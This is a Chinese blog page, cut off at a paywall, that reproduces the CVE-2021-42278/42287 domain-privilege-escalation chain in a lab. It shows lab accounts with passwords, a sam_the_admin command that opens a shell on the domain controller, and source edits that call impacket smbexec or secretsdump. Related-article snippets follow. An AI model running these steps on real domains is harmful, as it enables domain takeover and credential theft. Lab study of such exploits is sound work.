域控漏洞-CVE-2021-42287&42278复现

最新推荐文章于 2025-03-07 00:00:00 发布
最新推荐文章于 2025-03-07 00:00:00 发布
阅读量1.1w 收藏 10
点赞数 1
分类专栏: 信安文摘 文章标签: web安全 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FHLZLHQ/article/details/121964692
版权
该博客介绍了如何复现和利用CVE-2021-42278和CVE-2021-42287这两个域控漏洞。通过详细步骤,包括环境设置、使用sam-the-admin和noPac脚本、创建和修改机器账户、请求TGT和TGS票据,展示了如何从普通域用户升级权限到访问域控文件。涉及的工具包括Powermad、impacket、PowerShell、Rubeus等,并提供了相关资源链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

微信公众号:信安文摘

环境介绍

域:god.org

windows 7

192.168.52.143
机器名称:stu1
域内普通用户:liukaifeng01:hongrisec@2021@

windows server 2008(DC)

192.168.52.138
机器名称:owa
域管用户:administrator:rihongsec@2021

sam-the-admin python利用脚本

https://github.com/WazeHell/sam-the-admin

目前脚本只能在kali环境下运行,Windows下运行错误如下:

python3 sam_the_admin.py "god/liukaifeng01:hongrisec@2021@" -dc-ip 192.168.52.138 -shell

旧版kali无smbexec可执行文件:

查看源码实际就是调用两个可执行文件:

fbinary = "/usr/bin/impacket-smbexec"
    if options.dump:
        fbinary = "/usr/bin/impacket-secretsdump"
    getashell = f"KRB5CCNAME='{adminticket}' {fbinary} -target-ip {options.dc_ip} -dc-ip {options.dc_ip} -k -no-pass @'{dcfull}'                                                                    "
    os.system(getashell)

kali中存在这两个文件的py形式,/usr/local/bin/smbexec.py/usr/local/bin/secretsdump.py

修改源码为如下:

fbinary = "python3 /usr/local/bin/smbexec.py"
    if options.dump:
        fbinary = "python3 /usr/local/bin/secretsdump.py"
    getashell = f"KRB5CCNAME='{adminticket}' {fbinary} -target-ip {options.dc_ip} -dc-ip {options.dc_ip} -k -no-pass @'{dcfull}'
最低0.47元/天 解锁文章
内网渗透(七十九)之 CVE-2021-42287 权限提升漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-20 989
这个漏洞的产生核心的原因是KDC在处理UserName字段时的问题,而后结合两种攻击链针对内和跨进行攻击。当针对内攻击时,结合了CVE-2021-42278漏洞来修改机器⽤户的saMAccountName属性,让KDC找不到⽤户,⾛进处理UserName的逻辑。然后再利⽤KDC在处理S4U2Self时的逻辑问题(不校验发起S4U2Self请求的⽤户是否具有权限发起S4U2Self请求)以及重新⽣成PAC的这⼀特性来进⾏攻击。当针对跨攻击时,其实意义不⼤。
CVE-2021-42287&CVE-2021-42278 内提权
正是修行时
11-18 378
​倘见玉皇先跪奏:他生永不落红尘
CVE-2021-42287(Windows服务权限提升漏洞)
weixin_45682070的博客
12-16 2554
PAC PAC(Privilege Attribute Certificate),特权属性证书 需要提供User的SID和所在组Group的SID 只看上述的就简单解释并不能很清晰的了解,那么想要知道PAC这个概念,我们首先理一下kerberos的流程 网上很多kerberos如下: 1:用户向KDC发起AS_REQ,请求凭据是用户hash加密的时间戳,KDC使用用户hash进行解密,如果结果正确返回用krbtgt hash加密的TGT票据 2:用户凭借TGT票据向KDC发起针对特定服务的TGS_REQ
Windows服务权限提升漏洞CVE-2021-42287, CVE-2021-42278
热门推荐
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows服务权限提升漏洞CVE-2021-42287, CVE-2021-42278)是由于Active Directory 服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将内的普通用户权限提升到管理员权限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
Impacket工具中的横向渗透利器及其使用场景对比详解(psexec、smbexec、wmiexec、dcomexec、atexec)
最新发布
vortex5的博客
03-07 1129
在渗透测试中,横向移动(Lateral Movement)是指攻击者在获得一个系统的制权限后,通过网络进一步渗透到其他系统的过程。Impacket 是一款强大的渗透测试工具集,提供了多种实现横向渗透的脚本,常见的工具包括 、、、 和 。尽管这些工具都可以执行远程命令,但它们在工作原理、依赖的服务以及使用条件上有显著差异。下面我们将对这些工具进行详细的对比分析。 是 Impacket 中非常经典的工具,仿照了 Microsoft 的 工具。它通过 SMB(Server Message Block)协议和
CVE-2021-42287CVE-2021-42278内提权漏洞
总有人间一两风,填我十万八千梦
05-09 2935
内提权漏洞CVE-2021-42287CVE-2021-42278,只需一个普通用户即可获取权限
微软最新漏洞CVE-2021-42287
weixin_43888456的博客
12-18 797
微软最新暴出的漏洞CVE-2021-42287/CVE-2021-42278 权限提升漏洞可将内的任意用户提升至管权限,已复现[em]e182[/em] 在 AD 中请求ST票证时,首先需要提供 TGT票据。当 KDC 未找到请求的ST票证时,KDC 会自动再次搜索带有结尾的用户。漏洞原理:如果获得了DC用户的TGT票据且内有一台名为DC结尾的用户。 漏洞原理:如果获得了 DC 用户的TGT票据且内有一台名为DC结尾的用户。漏洞原理:如果获得了DC用户的TGT票据且内有一台名为DC,再将DC
内提权之CVE-2021-42278漏洞复现
一只爱吃橙子的羊
11-21 1753
内提权CVE-2021-42278漏洞复现,本文仅为验证漏洞,在本地环境测试验证,无其它目的。
安全漏洞CVE-2021-42287&CVE-2021-42278 内提权
HBohan的博客
12-25 2601
网络安全技术学习,承认⾃⼰的弱点不是丑事。只有对原理了然于⼼,才能突破更多的限制。拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板。知识⾯,决定看到的攻击⾯有多⼴;知识链,决定发动的杀伤链有多深。
微软通杀漏洞-CVE-2021-1675复现
Gamma_lab的博客
08-06 474
环境 受害机:window2019(192.168.153.133) 攻击机:kali(192.168.153.134) 利用前提 或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限 一定需要:一个普通的用户 一定需要:开启Spooler服务 环境搭建 安装impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py insta
Cve-2021-42278cve-202142287漏洞复现及原理讲解
keaideshuoshuo的博客
07-05 1199
Kerberos是一种计算机网络身份验证协议,用于在不安全的网络环境中提供安全的通信和强身份验证。其设计目标是通过密钥系统为网络中通信的客户机(Client)/服务器(Server)应用程序提供严格的身份验证服务,确保通信双方身份的真实性和安全性。
Windows提权漏洞CVE-2021-442287
qq_53579360的博客
11-25 999
Windows提权漏洞CVE-2021-442287
CVE-2021-42287/CVE-2021-42278 Windows提权漏洞分析】
mingyqf的博客
04-14 3967
转发至:安全客 https://www.anquanke.com/post/id/263910 CVE-2021-42287/CVE-2021-42278 Windows提权漏洞分析 ​ 阅读量 76400 ​ 分享到:
网络攻防|CVE-2021-42287CVE-2021-42278内提权
weixin_42282189的博客
12-20 2899
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 漏洞原理 Microsoft Windows Active Directory 服务权限提升漏洞CVE-2021-42278CVE-2021-42287)攻击者可利用该漏洞内的普通用户权限提升到管理员权限,造成风险和危害极大。 漏洞情报来源: 1、影响版本 CVE-2021-42278 ○ Windows Server 2012 R2 ○ Windows Server 2012 (S.
警告:绑的macOS设备和 CVE-2021-42287
m0_66725307的博客
12-22 462
在没有绑定的情况下,只有自动设备注册期间创建的第一个本地帐户或在用户发起的注册过程中在MDM中注册设备的用户才能利用用户级别的配置文件。虽然微软提供了有关该问题的更多详细信息,以及在其支持网站上的补救指导,但管理员立即发现因采取纠正措施而出现的后续问题:修复后的服务器不再允许macOS绑定到Active Directory。向苹果提交反馈:如果您的工作流程要求设备绑定到AD,请向苹果提交反馈,明确识别受影响的设备数量、使用案例和对组织的影响。一起讨论出,让您的Mac大军迁移到云认证的最佳计划。
CVE-2021-42287/CVE-2021-42278利用
weixin_45945976的博客
12-20 784
CVE-2021-42287/CVE-2021-42278利用 地址:https://github.com/cube0x0/noPac
内网渗透:六、CVE-2021-42287/CVE-2021-42278 内提权
liu_jia_liang的博客
02-22 1937
0x01简介 2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致内普通用户权限提升至管权限。0x02 影响0x02范围 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2...
CVE-2021-42287: sAMAccountName spoofing 内提权
anddddoooo的博客
02-21 580
ip:192.168.72.21,hostname:dc01内攻击者机器 ip:192.168.72.158,hostname:WIN10-01攻击者 kali 机器 ip:192.168.72.162。
CVE-2021-42278 & CVE-2021-42287内提权漏洞
总有人间一两风,填我十万八千梦
02-17 3047
2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致内普通用户权限提升至管权限。是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证内机器账户中是否有$,导致机器账户可以被假冒。是影响Kerberos特权属性证书(PAC)的安全绕过漏洞,允许通过假冒制器,使密钥分发中心KDC创建高权限票据。
Tiki组件漏洞复现CVE-2020-15906和CVE-2021-26119研究
通过上述知识点的详细阐述,我们对tiki组件的两个特定漏洞CVE-2020-15906和CVE-2021-26119有了全面的认识,以及如何在实际环境中复现这些漏洞和采取的防御措施有了深入的理解。安全研究者和系统管理员可以利用这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值